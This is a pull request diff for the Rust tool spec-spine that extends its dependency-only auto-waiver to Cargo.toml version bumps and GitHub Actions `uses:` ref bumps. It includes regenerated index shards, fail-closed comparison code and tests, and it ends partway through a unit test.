### PR TITLE
feat(030): extend dependency-only self-clear to cargo and workflow bumps

### DIFF
--- a/.derived/codebase-index/by-package/spec-spine-cli.json
+++ b/.derived/codebase-index/by-package/spec-spine-cli.json
@@ -6,5 +6,5 @@
     "specRef": "001-compile-registry"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "6c2f67c15a6884a8220602ce5c7cd1ca6f46a89b1cda1e9fc28ab2c53d73f1a8"
+  "shardHash": "2c40fb0eb15c8345837785bf16436f136400f7efa83288686ca647b7df291b13"
 }

--- a/.derived/codebase-index/by-package/spec-spine-core.json
+++ b/.derived/codebase-index/by-package/spec-spine-core.json
@@ -6,5 +6,5 @@
     "specRef": "001-compile-registry"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "c912ca0fd28b21b1e65fe1cce42ea3e9b931c145c46d695702c3122abc81c2b5"
+  "shardHash": "05ab08fdf1df93fb311d2bdf9afe1e268d3b0c9b0fbe42005fdd67551b378698"
 }

--- a/.derived/codebase-index/by-package/spec-spine-types.json
+++ b/.derived/codebase-index/by-package/spec-spine-types.json
@@ -6,5 +6,5 @@
     "specRef": "000-spec-spine-bootstrap"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "1a56c13bbe0430dfd9efa2e8a9e1fc6144d73b806e88dd634a36b40233bb4d7d"
+  "shardHash": "c08e44330e526fd49c92d47f91d166f5bd0a668117c364baf575e19045bb6e0e"
 }

--- a/.derived/codebase-index/by-spec/004-codebase-index.json
+++ b/.derived/codebase-index/by-spec/004-codebase-index.json
@@ -131,5 +131,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "27dd1b4a533ec0fabe2aef087bc8e807c36dae81fbad4cd9ceb6394e79b81d0f"
+  "shardHash": "09f22d551db233e4560ab907f0fe2298cbfc720a19fe99528fb33eb1daf53576"
 }

--- a/.derived/codebase-index/by-spec/030-cargo-workflow-dependency-waiver.json
+++ b/.derived/codebase-index/by-spec/030-cargo-workflow-dependency-waiver.json
@@ -1,9 +1,12 @@
 {
   "mapping": {
+    "amends": [
+      "004-codebase-index",
+      "005-coupling-gate"
+    ],
     "dependsOn": [
-      "001-compile-registry",
-      "002-registry-query",
-      "004-codebase-index"
+      "004-codebase-index",
+      "005-coupling-gate"
     ],
     "implementingPaths": [
       {
@@ -11,15 +14,7 @@
         "source": "spec-edge"
       },
       {
-        "path": "crates/spec-spine-cli/src/main.rs",
-        "source": "spec-edge"
-      },
-      {
         "path": "crates/spec-spine-cli/tests/couple.rs",
-        "source": "spec-edge"
-      },
-      {
-        "path": "crates/spec-spine-core/src/couple.rs",
         "source": "spec-edge"
       },
       {
@@ -27,11 +22,11 @@
         "source": "spec-edge"
       },
       {
-        "path": "crates/spec-spine-core/src/lib.rs",
+        "path": "crates/spec-spine-core/src/index.rs",
         "source": "spec-edge"
       },
       {
-        "path": "crates/spec-spine-core/tests/couple.rs",
+        "path": "crates/spec-spine-core/src/manifest.rs",
         "source": "spec-edge"
       }
     ],
@@ -43,7 +38,7 @@
           }
         ],
         "ownership": true,
-        "sourceField": "establishes",
+        "sourceField": "extends",
         "unit": {
           "kind": "file",
           "path": "crates/spec-spine-cli/src/cmd_couple.rs"
@@ -56,23 +51,10 @@
           }
         ],
         "ownership": true,
-        "sourceField": "establishes",
+        "sourceField": "extends",
         "unit": {
           "kind": "file",
           "path": "crates/spec-spine-cli/tests/couple.rs"
-        }
-      },
-      {
-        "locations": [
-          {
-            "file": "crates/spec-spine-core/src/couple.rs"
-          }
-        ],
-        "ownership": true,
-        "sourceField": "establishes",
-        "unit": {
-          "kind": "file",
-          "path": "crates/spec-spine-core/src/couple.rs"
         }
       },
       {
@@ -82,7 +64,7 @@
           }
         ],
         "ownership": true,
-        "sourceField": "establishes",
+        "sourceField": "extends",
         "unit": {
           "kind": "file",
           "path": "crates/spec-spine-core/src/dep_only.rs"
@@ -91,46 +73,33 @@
       {
         "locations": [
           {
-            "file": "crates/spec-spine-core/tests/couple.rs"
-          }
-        ],
-        "ownership": true,
-        "sourceField": "establishes",
-        "unit": {
-          "kind": "file",
-          "path": "crates/spec-spine-core/tests/couple.rs"
-        }
-      },
-      {
-        "locations": [
-          {
-            "file": "crates/spec-spine-cli/src/main.rs"
+            "file": "crates/spec-spine-core/src/index.rs"
           }
         ],
         "ownership": true,
         "sourceField": "extends",
         "unit": {
           "kind": "file",
-          "path": "crates/spec-spine-cli/src/main.rs"
+          "path": "crates/spec-spine-core/src/index.rs"
         }
       },
       {
         "locations": [
           {
-            "file": "crates/spec-spine-core/src/lib.rs"
+            "file": "crates/spec-spine-core/src/manifest.rs"
           }
         ],
         "ownership": true,
         "sourceField": "extends",
         "unit": {
           "kind": "file",
-          "path": "crates/spec-spine-core/src/lib.rs"
+          "path": "crates/spec-spine-core/src/manifest.rs"
         }
       }
     ],
-    "specId": "005-coupling-gate",
+    "specId": "030-cargo-workflow-dependency-waiver",
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "9be95b4903a14f346e64ee6d28b0f5fd72b1a94a8ae38dd5c4da19635d9bdbb6"
+  "shardHash": "f94adb5c814498643ca5c13e7f2117fce4236f750c91aa46325f9dfb6ff3d5e0"
 }

--- a/.derived/spec-registry/by-spec/004-codebase-index.json
+++ b/.derived/spec-registry/by-spec/004-codebase-index.json
@@ -58,6 +58,6 @@
     "summary": "The codebase indexer (code-as-source view): discover compilation units via the configurable manifest namespace, link code to specs three ways, resolve the file/section/symbol unit grammar to physical (file, line-span) locations (tree-sitter for symbols, Rust + TypeScript in v1), emit a deterministic index.json with a content-hash staleness mechanism, and answer authorities(unit). Establishes the manifest/section/symbol resolution layer and the `spec-spine index` CLI subcommand.\n",
     "title": "Codebase index and the file/section/symbol unit grammar"
   },
-  "shardHash": "c39532ea6057b9b570aab1c24eb948c1d7402e47b1aac71ae108b7bb889762f7",
+  "shardHash": "61a32ded0a0b85b3402157ad886ec058b3c596c908f72f9651c87104b13e23bb",
   "specVersion": "1.1.0"
 }

--- a/.derived/spec-registry/by-spec/005-coupling-gate.json
+++ b/.derived/spec-registry/by-spec/005-coupling-gate.json
@@ -70,6 +70,6 @@
     "summary": "The PR-time coupling gate (spec-spine.md guardrail 2): cross-reference every changed code path against the authority graph and refuse the merge when code drifts from the spec that owns it. A pure function of (config, registry, index, diff, waiver); the CLI parses `git diff --no-color -U0 --no-renames base...head` (quotepath off, end-of-options) into a typed DiffInput so git stays out of core. Matches a diff hunk to its owning unit at file, section, and symbol granularity; is amends-aware with the FR-005 strict-expansion guard; transfers authority across supersedes; honors PR-body waivers and an additive bypass list. Establishes the couple engine and the `spec-spine couple` subcommand.\n",
     "title": "The coupling gate: join the two views and refuse drift"
   },
-  "shardHash": "83725ffabb1a56f600e871e4acc07f858651bbbbfecdc9a39f72d66cfd02e1fe",
+  "shardHash": "30e189c73064b85c7749a819b5d0323a3e18f3ec7bb38f9134946c1b670cb2af",
   "specVersion": "1.1.0"
 }

--- a/.derived/spec-registry/by-spec/030-cargo-workflow-dependency-waiver.json
+++ b/.derived/spec-registry/by-spec/030-cargo-workflow-dependency-waiver.json
@@ -1,0 +1,78 @@
+{
+  "record": {
+    "amends": [
+      "004-codebase-index",
+      "005-coupling-gate"
+    ],
+    "created": "2026-07-03",
+    "dependsOn": [
+      "004-codebase-index",
+      "005-coupling-gate"
+    ],
+    "extends": [
+      {
+        "nature": "additive",
+        "spec": "004-codebase-index",
+        "unit": {
+          "kind": "file",
+          "path": "crates/spec-spine-core/src/manifest.rs"
+        }
+      },
+      {
+        "nature": "additive",
+        "spec": "004-codebase-index",
+        "unit": {
+          "kind": "file",
+          "path": "crates/spec-spine-core/src/index.rs"
+        }
+      },
+      {
+        "nature": "additive",
+        "spec": "005-coupling-gate",
+        "unit": {
+          "kind": "file",
+          "path": "crates/spec-spine-core/src/dep_only.rs"
+        }
+      },
+      {
+        "nature": "additive",
+        "spec": "005-coupling-gate",
+        "unit": {
+          "kind": "file",
+          "path": "crates/spec-spine-cli/src/cmd_couple.rs"
+        }
+      },
+      {
+        "nature": "additive",
+        "spec": "005-coupling-gate",
+        "unit": {
+          "kind": "file",
+          "path": "crates/spec-spine-cli/tests/couple.rs"
+        }
+      }
+    ],
+    "id": "030-cargo-workflow-dependency-waiver",
+    "implementation": "complete",
+    "kind": "tooling",
+    "owner": "The spec-spine Authors",
+    "sectionHeadings": [
+      "030: Cargo and workflow dependabot bumps self-clear",
+      "1. Purpose",
+      "2. Territory",
+      "3. Behavior",
+      "3.1 Cargo freshness projection (amends 004 §3.5)",
+      "3.2 Cargo dependency-only auto-waiver (amends 005 §3.5)",
+      "3.3 Workflow dependency-only auto-waiver (amends 005 §3.5)",
+      "3.4 The whole-diff rule is unchanged",
+      "3.5 Config, determinism, and report shape",
+      "3.6 Tests (minimum)",
+      "4. Out of scope"
+    ],
+    "specPath": "specs/030-cargo-workflow-dependency-waiver/spec.md",
+    "status": "approved",
+    "summary": "Amends 004 §3.5 and 005 §3.5, extending the paired 2026-06-11 npm dependency-only mechanism to the cargo and GitHub Actions ecosystems so a dependabot-class bump self-clears without a human waiver. Freshness half: Cargo.toml folds into the index content hash as a governance projection (its dependency tables stripped), mirroring npm, so a version bump leaves the committed shards fresh. Coupling half: the mechanical auto-waiver recognizes a Cargo.toml whose only change is dependency version specifiers, and a `.github/workflows/*.yml` whose only change is the `@ref` of `uses:` action references. Every non-version edit (a new or removed dependency, a feature / git / path change, a `run:` / `with:` edit, an added step or table, an unpinned action, a spec-metadata edit) still refuses the waiver, fail-closed. A claimed workflow file (007/008/021's release.yml) and a crate whose direct dependencies dependabot bumps are the live acceptance tests.\n",
+    "title": "Cargo and workflow dependabot bumps self-clear: freshness projection + auto-waiver"
+  },
+  "shardHash": "8a7d53e4b894e9762ea1401b3c84443c5d2e49e1e55274168de7c487176f7a78",
+  "specVersion": "1.1.0"
+}

--- a/crates/spec-spine-cli/src/cmd_couple.rs
+++ b/crates/spec-spine-cli/src/cmd_couple.rs
@@ -100,11 +100,13 @@ fn build_diff_input(repo: &Path, args: &CoupleArgs) -> Result<DiffInput, Error> 
     Ok(parse_unified_diff(&raw))
 }
 
-/// Attempt the spec 005 §3.5 mechanical auto-waiver: every non-bypassed
-/// changed path must be a `package.json` whose base→head change is
-/// dependency-only. Contents come from `git show` at the **merge base** (the
-/// diff is three-dot, so the base side is `merge-base(base, head)`, not the
-/// base branch tip) and at `head`. Any git failure refuses the auto-waiver
+/// Attempt the spec 005 §3.5 mechanical auto-waiver (extended to cargo and
+/// workflow manifests by spec 030): every non-bypassed changed path must be a
+/// recognized dependency manifest (`package.json` / `Cargo.toml` /
+/// `.github/workflows/*.yml`) whose base→head change is confined to dependency
+/// version pins. Contents come from `git show` at the **merge base** (the diff
+/// is three-dot, so the base side is `merge-base(base, head)`, not the base
+/// branch tip) and at `head`. Any git failure refuses the auto-waiver
 /// fail-closed rather than erroring the gate.
 ///
 /// The bypass verdict is claim-aware (spec 009): it assembles the committed
@@ -127,11 +129,12 @@ fn try_dependency_only_waiver(
         .filter(|f| !is_bypassed_path(cfg, &index, &f.path))
         .collect();
     // Cheap pre-filter before any git spawn: the waiver can only ever apply
-    // when every non-bypassed path is a package.json manifest.
+    // when every non-bypassed path is a recognized dependency manifest
+    // (package.json / Cargo.toml / workflow YAML).
     if candidates.is_empty()
         || !candidates
             .iter()
-            .all(|f| spec_spine_core::is_package_json(&f.path))
+            .all(|f| spec_spine_core::is_dependency_manifest(&f.path))
     {
         return Ok(None);
     }

--- a/crates/spec-spine-cli/tests/couple.rs
+++ b/crates/spec-spine-cli/tests/couple.rs
@@ -400,3 +400,157 @@ fn claimed_floor_path_refuses_the_auto_waiver() {
         String::from_utf8_lossy(&out.stderr)
     );
 }
+
+// ===== spec 030: cargo + workflow dependabot-class paths =====
+
+/// A minimal governed repo: one cargo crate discovered and floor-owned by spec
+/// 001-a via its manifest metadata, with one external dependency to bump.
+fn setup_cargo(root: &Path, auto_waive: bool) {
+    if auto_waive {
+        write(
+            root,
+            "spec-spine.toml",
+            "[coupling]\nauto_waive_dependency_only = true\n",
+        );
+    }
+    write(root, "Cargo.toml", "[workspace]\nmembers = [\"crate-a\"]\n");
+    write(
+        root,
+        "crate-a/Cargo.toml",
+        "[package]\nname = \"crate-a\"\nversion = \"0.1.0\"\n\
+         [package.metadata.spec-spine]\nspec = \"001-a\"\n\
+         [dependencies]\nserde = \"1.0.0\"\n",
+    );
+    write(root, "crate-a/src/lib.rs", "pub fn a() {}\n");
+    write(
+        root,
+        "specs/001-a/spec.md",
+        "---\nid: \"001-a\"\ntitle: \"A\"\nstatus: approved\ncreated: \"2026-06-09\"\n\
+         summary: \"s\"\nestablishes:\n  - \"crate-a/src/lib.rs\"\n---\n# 001-a\n## body\n",
+    );
+}
+
+#[test]
+fn cargo_dependency_bump_stays_fresh_and_auto_waives() {
+    let tmp = tempfile::tempdir().unwrap();
+    let root = tmp.path();
+    setup_cargo(root, true);
+    git_in(root, &["init", "-q"]);
+    refresh(root);
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "base"]);
+
+    // Dependabot-style cargo bump: a dependency version only. No re-index, no
+    // spec edit, no PR body. The Cargo.toml is floor-owned by 001-a.
+    write(
+        root,
+        "crate-a/Cargo.toml",
+        "[package]\nname = \"crate-a\"\nversion = \"0.1.0\"\n\
+         [package.metadata.spec-spine]\nspec = \"001-a\"\n\
+         [dependencies]\nserde = \"1.0.5\"\n",
+    );
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "bump"]);
+
+    // (a) Still FRESH: the cargo governance projection (spec 004 §3.5, spec 030)
+    // strips dependency tables, so a version bump is not a hashed input.
+    let fresh = index_check(root);
+    assert_eq!(
+        code(&fresh),
+        0,
+        "index must stay fresh on a cargo dep-only bump: {}",
+        String::from_utf8_lossy(&fresh.stderr)
+    );
+
+    // (b) The coupling gate self-waives (spec 005 §3.5, extended by spec 030).
+    let out = couple_git(root);
+    assert_eq!(code(&out), 0, "{}", String::from_utf8_lossy(&out.stderr));
+    assert!(
+        String::from_utf8_lossy(&out.stdout).contains("auto-waived"),
+        "stdout: {}",
+        String::from_utf8_lossy(&out.stdout)
+    );
+}
+
+#[test]
+fn cargo_feature_edit_without_bump_still_drifts() {
+    let tmp = tempfile::tempdir().unwrap();
+    let root = tmp.path();
+    setup_cargo(root, true);
+    git_in(root, &["init", "-q"]);
+    refresh(root);
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "base"]);
+
+    // A feature-set change hiding as a dependency edit: not dependency-only.
+    write(
+        root,
+        "crate-a/Cargo.toml",
+        "[package]\nname = \"crate-a\"\nversion = \"0.1.0\"\n\
+         [package.metadata.spec-spine]\nspec = \"001-a\"\n\
+         [dependencies]\nserde = { version = \"1.0.0\", features = [\"derive\"] }\n",
+    );
+    refresh(root); // a shape flip may alter nothing the indexer reads; refresh anyway
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "features"]);
+
+    let out = couple_git(root);
+    assert_eq!(
+        code(&out),
+        1,
+        "a features edit must refuse the cargo auto-waiver: {}",
+        String::from_utf8_lossy(&out.stdout)
+    );
+}
+
+#[test]
+fn workflow_uses_bump_auto_waives() {
+    let tmp = tempfile::tempdir().unwrap();
+    let root = tmp.path();
+    // Reuse the cargo repo for a valid, indexable tree, then add a workflow
+    // file explicitly claimed by a spec (so it overrides the .github/ floor).
+    setup_cargo(root, true);
+    write(
+        root,
+        ".github/workflows/ci.yml",
+        "name: CI\non: [push]\njobs:\n  build:\n    runs-on: ubuntu-latest\n    \
+         steps:\n      - uses: actions/checkout@v4\n      - run: cargo test\n",
+    );
+    write(
+        root,
+        "specs/002-ci/spec.md",
+        "---\nid: \"002-ci\"\ntitle: \"CI\"\nstatus: approved\ncreated: \"2026-06-09\"\n\
+         summary: \"s\"\nestablishes:\n  - \".github/workflows/ci.yml\"\n---\n# 002-ci\n## body\n",
+    );
+    git_in(root, &["init", "-q"]);
+    refresh(root);
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "base"]);
+
+    // Dependabot github-actions bump: the action ref only. No re-index (a file
+    // unit carries no span, so it is not a hashed input), no spec edit.
+    write(
+        root,
+        ".github/workflows/ci.yml",
+        "name: CI\non: [push]\njobs:\n  build:\n    runs-on: ubuntu-latest\n    \
+         steps:\n      - uses: actions/checkout@v5\n      - run: cargo test\n",
+    );
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "bump-action"]);
+
+    let fresh = index_check(root);
+    assert_eq!(
+        code(&fresh),
+        0,
+        "a file-unit workflow bump must not stale the index: {}",
+        String::from_utf8_lossy(&fresh.stderr)
+    );
+
+    let out = couple_git(root);
+    assert_eq!(code(&out), 0, "{}", String::from_utf8_lossy(&out.stderr));
+    assert!(
+        String::from_utf8_lossy(&out.stdout).contains("auto-waived"),
+        "stdout: {}",
+        String::from_utf8_lossy(&out.stdout)
+    );
+}

--- a/crates/spec-spine-core/src/dep_only.rs
+++ b/crates/spec-spine-core/src/dep_only.rs
@@ -1,21 +1,31 @@
 //! Mechanical dependency-only auto-waiver (spec 005 §3.5 amendment,
-//! 2026-06-11).
+//! 2026-06-11; extended to the cargo and workflow ecosystems by spec 030).
 //!
-//! Dependabot-class PRs change only version strings inside `package.json`
-//! dependency tables, but a `package.json` claimed by a spec (via its
-//! manifest metadata) fires the coupling gate, and a bot cannot edit specs
-//! or PR bodies. Path-level bypass is the wrong tool: it would exempt the
-//! whole manifest, including the spec-binding metadata the gate exists to
-//! protect. The mechanical rule instead compares the **parsed JSON** of the
-//! base and head versions of each changed manifest: the two documents must
-//! be semantically identical everywhere except *version strings* inside the
-//! standard dependency tables (same package keys; values may differ only
-//! where both sides are strings). Anything else (a new or removed package,
-//! a `scripts` edit, a spec-metadata edit, a non-object document) refuses
-//! the auto-waiver, fail-closed.
+//! Dependabot-class PRs change only version pins, but a manifest claimed by a
+//! spec fires the coupling gate, and a bot cannot edit specs or PR bodies.
+//! Path-level bypass is the wrong tool: it would exempt the whole manifest,
+//! including the spec-binding metadata the gate exists to protect. The
+//! mechanical rule instead compares the **parsed** base and head of each
+//! changed file: the two documents must be semantically identical everywhere
+//! except the dependency version pins of that file's ecosystem. Three classes
+//! are understood, each with a fail-closed checker:
+//!
+//! - `package.json` (npm): version strings inside the standard dependency
+//!   tables (`dependency_only_change`).
+//! - `Cargo.toml` (cargo): the version specifier of an existing dependency, as
+//!   a bare string or a table's `version` field (`cargo_dependency_only_change`).
+//! - `.github/workflows/*.yml` (GitHub Actions): the `@ref` of a `uses:` action
+//!   reference, same `owner/action` (`workflow_dependency_only_change`).
+//!
+//! Anything else (a new or removed dependency, a `scripts` / `run:` / `with:`
+//! edit, a spec-metadata edit, a feature-flag change, an added step or table,
+//! a non-parseable document) refuses the auto-waiver, fail-closed.
 //!
 //! Like everything in core, this is pure: the CLI resolves the merge-base,
-//! fetches both file versions via `git show`, and hands the contents in.
+//! fetches both file versions via `git show`, and hands the contents in. The
+//! paired freshness half (a dependency bump must not stale the committed
+//! index) lives in spec 004 §3.5's governance-projection hashing
+//! (`manifest.rs::npm_hash_projection` / `cargo_hash_projection`).
 
 use crate::couple::Waiver;
 
@@ -28,6 +38,12 @@ pub const DEPENDENCY_TABLES: &[&str] = &[
     "peerDependencies",
 ];
 
+/// The `Cargo.toml` tables whose dependency **version** specifiers may change
+/// under the auto-waiver. Recognized wherever cargo places them: at the top
+/// level, under `[workspace]`, and under each `[target.<cfg>]`.
+pub const CARGO_DEPENDENCY_TABLES: &[&str] =
+    &["dependencies", "dev-dependencies", "build-dependencies"];
+
 /// One changed file with both sides of its content. `None` = the file is
 /// absent on that side (created or deleted): never dependency-only.
 #[derive(Clone, Debug)]
@@ -37,32 +53,47 @@ pub struct FileContents {
     pub head: Option<String>,
 }
 
-/// The mechanical verdict over a whole diff: `Some(Waiver)` iff **every**
-/// entry is a `package.json` whose base→head change is dependency-only.
-/// An empty slice yields `None`: there is nothing to waive.
+/// The mechanical verdict over a whole diff: `Some(Waiver)` iff **every** entry
+/// is a recognized dependency manifest whose base→head change is confined to
+/// dependency version pins. An empty slice yields `None`: there is nothing to
+/// waive.
 pub fn dependency_only_waiver(files: &[FileContents]) -> Option<Waiver> {
     if files.is_empty() {
         return None;
     }
     for f in files {
-        if !is_package_json(&f.path) {
-            return None;
-        }
         let (Some(base), Some(head)) = (&f.base, &f.head) else {
             return None; // created or deleted manifest, not a version bump
         };
-        if !dependency_only_change(base, head) {
+        let ok = if is_package_json(&f.path) {
+            dependency_only_change(base, head)
+        } else if is_cargo_toml(&f.path) {
+            cargo_dependency_only_change(base, head)
+        } else if is_workflow_yaml(&f.path) {
+            workflow_dependency_only_change(base, head)
+        } else {
+            false // not a recognized dependency manifest
+        };
+        if !ok {
             return None;
         }
     }
     Some(Waiver {
         reason: format!(
-            "dependency-only diff (mechanical auto-waiver): version-string \
-             changes confined to dependency tables in {} package.json file(s)",
+            "dependency-only diff (mechanical auto-waiver): version pins only, \
+             across {} manifest file(s) (package.json / Cargo.toml dependency \
+             tables, workflow `uses:` action refs)",
             files.len()
         ),
     })
 }
+
+/// `path` is a manifest class the mechanical auto-waiver understands.
+pub fn is_dependency_manifest(path: &str) -> bool {
+    is_package_json(path) || is_cargo_toml(path) || is_workflow_yaml(path)
+}
+
+// ===== npm: package.json =====
 
 /// `path` names a `package.json` manifest (any directory).
 pub fn is_package_json(path: &str) -> bool {
@@ -120,6 +151,193 @@ pub fn dependency_only_change(base: &str, head: &str) -> bool {
     true
 }
 
+// ===== cargo: Cargo.toml =====
+
+/// `path` names a `Cargo.toml` manifest (any directory).
+pub fn is_cargo_toml(path: &str) -> bool {
+    path == "Cargo.toml" || path.ends_with("/Cargo.toml")
+}
+
+/// True iff `base` and `head` parse as TOML documents equal everywhere except
+/// the **version specifiers of existing dependencies**. A dependency table is
+/// recognized by key name ([`CARGO_DEPENDENCY_TABLES`]) at any depth, so this
+/// covers top-level `[dependencies]`, `[workspace.dependencies]`, and
+/// `[target.<cfg>.dependencies]` alike. Inside a dependency table the package
+/// key sets must match; each entry is either a bare version string on both
+/// sides (which may differ) or a table on both sides with an identical field
+/// set where only `version` may differ (both sides strings). Any add/remove of
+/// a dependency, a shape flip (string ↔ table), a feature / git / path / rename
+/// edit, or any change outside a dependency table refuses the waiver.
+///
+/// Parse failure or a non-table document is `false` (fail-closed). A
+/// formatting-only change is `true`: it alters no governed fact.
+pub fn cargo_dependency_only_change(base: &str, head: &str) -> bool {
+    let (Ok(base), Ok(head)) = (
+        toml::from_str::<toml::Value>(base),
+        toml::from_str::<toml::Value>(head),
+    ) else {
+        return false;
+    };
+    if !matches!(
+        (&base, &head),
+        (toml::Value::Table(_), toml::Value::Table(_))
+    ) {
+        return false; // a Cargo.toml is a table document
+    }
+    cargo_value_eq_except_versions(&base, &head)
+}
+
+/// Structural equality over two TOML values, treating any table entry whose
+/// key is a [`CARGO_DEPENDENCY_TABLES`] name as a dependency table (compared by
+/// [`cargo_dep_table_versions_only`]) rather than requiring exact equality.
+fn cargo_value_eq_except_versions(base: &toml::Value, head: &toml::Value) -> bool {
+    use toml::Value::{Array, Table};
+    match (base, head) {
+        (Table(b), Table(h)) => {
+            if b.len() != h.len() {
+                return false; // a key (a table or field) added or removed
+            }
+            for (key, bv) in b {
+                let Some(hv) = h.get(key) else {
+                    return false;
+                };
+                if CARGO_DEPENDENCY_TABLES.contains(&key.as_str()) {
+                    let (Table(bt), Table(ht)) = (bv, hv) else {
+                        return false;
+                    };
+                    if !cargo_dep_table_versions_only(bt, ht) {
+                        return false;
+                    }
+                } else if !cargo_value_eq_except_versions(bv, hv) {
+                    return false;
+                }
+            }
+            true
+        }
+        (Array(b), Array(h)) => {
+            b.len() == h.len()
+                && b.iter()
+                    .zip(h)
+                    .all(|(bv, hv)| cargo_value_eq_except_versions(bv, hv))
+        }
+        (b, h) => b == h,
+    }
+}
+
+/// Two cargo dependency tables that differ only in dependency versions:
+/// identical package key sets; each entry a string on both sides (may differ),
+/// or a table on both sides with an identical field set where only `version`
+/// differs (both string).
+fn cargo_dep_table_versions_only(base: &toml::Table, head: &toml::Table) -> bool {
+    use toml::Value::{String as TStr, Table};
+    if base.len() != head.len() {
+        return false; // dependency added or removed
+    }
+    for (name, bv) in base {
+        let Some(hv) = head.get(name) else {
+            return false;
+        };
+        match (bv, hv) {
+            (TStr(_), TStr(_)) => {} // bare version requirement; may differ
+            (Table(bt), Table(ht)) => {
+                if bt.len() != ht.len() {
+                    return false; // a field (feature, optional, ...) added or removed
+                }
+                for (field, bfv) in bt {
+                    let Some(hfv) = ht.get(field) else {
+                        return false;
+                    };
+                    if field == "version" {
+                        // Only version may differ, and only string→string.
+                        if bfv != hfv && !(bfv.is_str() && hfv.is_str()) {
+                            return false;
+                        }
+                    } else if bfv != hfv {
+                        return false; // features / git / path / optional / ...
+                    }
+                }
+            }
+            _ => return false, // shape flip (string ↔ table)
+        }
+    }
+    true
+}
+
+// ===== GitHub Actions: .github/workflows/*.yml =====
+
+/// `path` names a workflow file under `.github/workflows/` (any depth).
+pub fn is_workflow_yaml(path: &str) -> bool {
+    let in_workflows =
+        path.starts_with(".github/workflows/") || path.contains("/.github/workflows/");
+    in_workflows && (path.ends_with(".yml") || path.ends_with(".yaml"))
+}
+
+/// True iff `base` and `head` parse as YAML equal everywhere except the `@ref`
+/// of `uses:` action references (same `owner/action`, a differing pinned ref).
+/// Any other change (a new/removed step or job, a `with:` / `run:` / `env:`
+/// edit, an added key, an unpinned action) refuses the waiver, fail-closed.
+///
+/// YAML comments (where a SHA-pinned action records its human version) are
+/// dropped by the parser on both sides, so comment-only churn is invisible and
+/// harmless. Parse failure is `false` (fail-closed).
+pub fn workflow_dependency_only_change(base: &str, head: &str) -> bool {
+    let (Ok(base), Ok(head)) = (
+        serde_yaml::from_str::<serde_yaml::Value>(base),
+        serde_yaml::from_str::<serde_yaml::Value>(head),
+    ) else {
+        return false;
+    };
+    yaml_eq_except_uses_ref(&base, &head)
+}
+
+/// Structural equality over two YAML values, allowing only the `@ref` of a
+/// `uses:` scalar to differ (via [`uses_ref_only_differs`]).
+fn yaml_eq_except_uses_ref(base: &serde_yaml::Value, head: &serde_yaml::Value) -> bool {
+    use serde_yaml::Value::{Mapping, Sequence};
+    match (base, head) {
+        (Mapping(b), Mapping(h)) => {
+            if b.len() != h.len() {
+                return false; // a key added or removed
+            }
+            for (k, bv) in b {
+                let Some(hv) = h.get(k) else {
+                    return false;
+                };
+                if k.as_str() == Some("uses") {
+                    if !uses_ref_only_differs(bv, hv) {
+                        return false;
+                    }
+                } else if !yaml_eq_except_uses_ref(bv, hv) {
+                    return false;
+                }
+            }
+            true
+        }
+        (Sequence(b), Sequence(h)) => {
+            b.len() == h.len()
+                && b.iter()
+                    .zip(h)
+                    .all(|(bv, hv)| yaml_eq_except_uses_ref(bv, hv))
+        }
+        (b, h) => b == h,
+    }
+}
+
+/// A `uses:` scalar changed only in its pinned version ref: both are strings of
+/// the form `owner/action@ref` with an identical, non-empty `owner/action` and
+/// both pinned (both contain `@`); the ref after `@` may differ. A pin added or
+/// removed, a changed action path, or a non-string value refuses.
+fn uses_ref_only_differs(base: &serde_yaml::Value, head: &serde_yaml::Value) -> bool {
+    let (Some(b), Some(h)) = (base.as_str(), head.as_str()) else {
+        return base == head; // non-string `uses`: require exact equality
+    };
+    match (b.split_once('@'), h.split_once('@')) {
+        (Some((ba, _)), Some((ha, _))) => !ba.is_empty() && ba == ha,
+        (None, None) => b == h, // both unpinned / local; must be identical
+        _ => false,             // a pin added or removed
+    }
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -131,6 +349,8 @@ mod tests {
             head: Some(head.to_string()),
         }
     }
+
+    // ===== npm =====
 
     const BASE: &str = r#"{
         "name": "app",
@@ -205,6 +425,182 @@ mod tests {
         assert!(!dependency_only_change("[]", "[]")); // non-object
     }
 
+    // ===== cargo =====
+
+    const CARGO: &str = r#"
+[package]
+name = "crate-a"
+version = "0.1.0"
+edition = "2024"
+
+[package.metadata.spec-spine]
+spec = "014-api"
+
+[lib]
+proc-macro = false
+
+[features]
+default = ["std"]
+std = []
+
+[dependencies]
+serde = "1.0.0"
+serde_json = { version = "1.0", features = ["preserve_order"] }
+
+[dev-dependencies]
+tempfile = "3"
+
+[workspace.dependencies]
+shared = "2.1"
+"#;
+
+    #[test]
+    fn cargo_bare_and_table_version_bump_is_dependency_only() {
+        let head = CARGO
+            .replace(r#"serde = "1.0.0""#, r#"serde = "1.0.5""#)
+            .replace(
+                r#"version = "1.0", features"#,
+                r#"version = "1.0.9", features"#,
+            )
+            .replace(r#"shared = "2.1""#, r#"shared = "2.4""#);
+        assert!(cargo_dependency_only_change(CARGO, &head));
+    }
+
+    #[test]
+    fn cargo_added_dependency_is_not() {
+        let head = CARGO.replace(r#"serde = "1.0.0""#, "serde = \"1.0.0\"\nregex = \"1\"");
+        assert!(!cargo_dependency_only_change(CARGO, &head));
+    }
+
+    #[test]
+    fn cargo_removed_dependency_is_not() {
+        let head = CARGO.replace("tempfile = \"3\"", "");
+        assert!(!cargo_dependency_only_change(CARGO, &head));
+    }
+
+    #[test]
+    fn cargo_feature_edit_is_not() {
+        let head = CARGO.replace(
+            r#"features = ["preserve_order"]"#,
+            r#"features = ["arbitrary_precision"]"#,
+        );
+        assert!(!cargo_dependency_only_change(CARGO, &head));
+    }
+
+    #[test]
+    fn cargo_package_version_edit_is_not() {
+        let head = CARGO.replace(r#"version = "0.1.0""#, r#"version = "0.2.0""#);
+        assert!(!cargo_dependency_only_change(CARGO, &head));
